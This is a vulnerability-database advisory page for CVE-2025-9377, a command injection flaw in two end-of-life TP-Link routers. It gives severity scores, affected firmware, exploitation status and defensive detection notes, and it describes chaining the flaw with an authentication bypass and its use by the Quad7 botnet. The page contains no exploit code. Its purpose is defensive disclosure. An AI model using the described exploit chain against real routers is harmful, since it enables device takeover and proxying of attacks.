cbcvebase.
CVE-2025-9377
published 2025-08-29

CVE-2025-9377: The authenticated remote command execution (RCE) vulnerability exists in the Parental Control page on TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9. This…

PriorityP181high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2025-09-24
Exploited in the wild
EPSS
11.75%
95.5th percentile
The authenticated remote command execution (RCE) vulnerability exists in the Parental Control page on TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9. This issue affects Archer C7(EU) V2: before 241108 and TL-WR841N/ND(MS) V9: before 241108. Both products have reached the status of EOL (end-of-life). It's recommending to purchase the new product to ensure better performance and security. If replacement is not an option in the short term, please use the second reference link to download and install the patch(es).

Affected

5 ranges
VendorProductVersion rangeFixed in
tp-linkarcher_c7_firmware< 241108241108
tp-linktl-wr841n_firmware< 241108241108
tp-linktl-wr841nd_firmware< 241108241108
tp-link_systems_incarcher_c7_v2< 241108241108
tp-link_systems_inctl-wr841n_nd_v9< 241108241108

Detection & IOCsextracted from sources · hover to see the quote

  • CVE-2025-9377 is an OS command injection vulnerability located specifically in the Parental Control page of affected TP-Link routers (Archer C7(EU) V2 and TL-WR841N/ND(MS) V9); focus detection on HTTP requests targeting the Parental Control page with anomalous or shell-metacharacter-containing input.
  • CVE-2025-9377 is chained with CVE-2023-50224 (authentication bypass) to achieve unauthenticated RCE; detection should look for exploitation of both CVEs in sequence against the same source/destination pair.
  • Post-exploitation activity associated with this CVE includes the Quad7 botnet converting compromised routers into proxies and traffic relays; monitor for unexpected outbound proxy/relay traffic from TP-Link router management IPs.
  • Threat actors leveraging compromised routers (via this CVE chain) have been observed conducting password spray attacks against cloud services and Microsoft 365; correlate router compromise indicators with downstream credential-spray telemetry.
  • Chinese threat actors have been observed proxying/relaying malicious attacks through routers compromised via this CVE to blend with legitimate traffic; look for unusual routing or tunneling behaviour originating from TP-Link router management interfaces.
  • ·Exploitation requires authentication; however, CVE-2023-50224 (auth bypass) is chained with this CVE to enable unauthenticated RCE — detections should not assume a valid session is required when both CVEs are used together.
  • ·Both affected products (Archer C7(EU) V2 and TL-WR841N/ND(MS) V9) have reached End-of-Life status; patched firmware (241108) exists but vendor recommends hardware replacement — deployed detections should account for the likelihood that many devices will remain unpatched indefinitely.
  • ·CISA's remediation due date is 2025-09-24; after this date, unpatched devices in federal environments should be treated as actively compromised until proven otherwise.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.6HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck8.6HIGH
cisa8.6HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.